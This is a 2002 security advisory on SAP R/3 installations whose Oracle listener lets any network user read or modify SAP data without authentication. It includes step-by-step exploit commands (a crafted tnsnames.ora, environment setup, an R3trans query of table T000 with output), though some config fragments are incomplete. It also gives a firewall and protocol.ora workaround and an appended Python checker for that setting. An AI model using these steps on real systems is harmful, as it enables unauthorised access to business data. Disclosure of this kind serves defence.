
SAP R/3 spoofing via database listener
30th Apr 2002 [SBWID-5317]



	All R/3 Releases using SQL*net V2 (3.x, 4.x, 6.10)


	From Jochen Hein's announcement:

	Every user having network access to the  oracle  listener  port  on  the
	database host may read/write/modify any SAP data.

	 Exploit :



	Needed knowledge: IP address (and port) of the database host and the
	System ID (SID). You may get them with a packet sniffer, social
	engineering or just running sapinfo against a running SAP R/3. sapinfo
	also tells you the R/3 release, which we'll need (we use R3trans of
	that release).

	With this information an attacker can create a local user sidadm,
	craft a tnsnames.ora and an environment for running R3trans.



	        (ADDRESS =

	          (COMMUNITY =

	          (PROTOCOL = TCP)

	          (Host = hostname)

	          (Port = 1527)




	       (SID = SID)

	       (GLOBAL_NAME =




	And running the commands (note you need the R3trans from the target  R/3

	sidadm> export TNS_ADMIN=$HOME/

	sidadm> export ORACLE_HOME=/oracle/SID

	sidadm> export ORACLE_SID=SID

	sidadm> export PATH="$PATH:/oracle/SID/817_32/bin:/usr/sap/SID/SYS/exe/run"

	sidadm> export dbms_type=ora

	sidadm> export DIR_LIBRARY=/usr/sap/SID/SYS/exe/run

	sidadm> export dbs_ora_tnsname=SID

	sidadm> export TNS_ADMIN=/home/sidadm

	sidadm> cat control




	# select table where name = T000

	select * from t000

	sidadm> R3trans control


	sidadm> strings trans.dat


	q  000SAP AG             Walldorf               DEM [...]

	q  001Auslieferungsmandant R11 Kundstadt        EUR [...]




	Any user on the  local  network  can  access  any  SAP  data  read/write
	without password. No SAP authority checks are applied.


	 References :



	A complete exploit and more remarks are (in German) here.

	OSS note 186119.






	Workaround is to restrict access to the Oracle port either with  network
	means (a firewall) or using the following protocol.ora  options  on  the
	database server:

	tcp.nodelay = true

	tcp.validnode_checking = yes

	tcp.invited_nodes = ( hostname, hostname )
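
A check for the workaround above, added here as an example and not part of the original advisory: it parses the text of a protocol.ora and reports when node checking is off or no invited nodes are listed. The function names, the sample files and the host names are constructed for illustration.

```python
import re

# Constructed sample files (not from the advisory); host names are placeholders.
WEAK = "# listener accepts every client\ntcp.nodelay = true\n"
HALF = "tcp.validnode_checking = yes\n# tcp.invited_nodes = ( appserver1 )\n"
HARDENED = """\
tcp.nodelay = true
TCP.VALIDNODE_CHECKING = yes
tcp.invited_nodes = ( appserver1,
                      appserver2 )
"""

def parse_ora(text):
    """Return {lowercased name: value}; a value is a token or a (...) list."""
    # Drop '#' comments first so commented-out settings are not counted.
    body = "\n".join(line.split("#", 1)[0] for line in text.splitlines())
    pairs = re.findall(r"([\w.]+)\s*=\s*(\([^()]*\)|[^\s()]+)", body)
    return {name.lower(): value for name, value in pairs}

def node_list(value):
    """Split '( a, b )' into ['a', 'b']; the list may span several lines."""
    return [n.strip() for n in value.strip("() \t\n").split(",") if n.strip()]

def audit(text):
    """Return findings for the two access-control options in the workaround."""
    params = parse_ora(text)
    findings = []
    # Assumption: only 'yes', the value the advisory gives, counts as enabled.
    if params.get("tcp.validnode_checking", "").lower() != "yes":
        findings.append("tcp.validnode_checking is not set to yes")
    if not node_list(params.get("tcp.invited_nodes", "")):
        findings.append("tcp.invited_nodes is missing or empty")
    return findings

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("half", HALF), ("hardened", HARDENED)):
        print(label, audit(text) or "OK")
```

An empty result means both options are present; it does not show that the listed hosts are the right ones, so the invited node list still needs a review against the actual R/3 application servers.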



	There is no patch available.
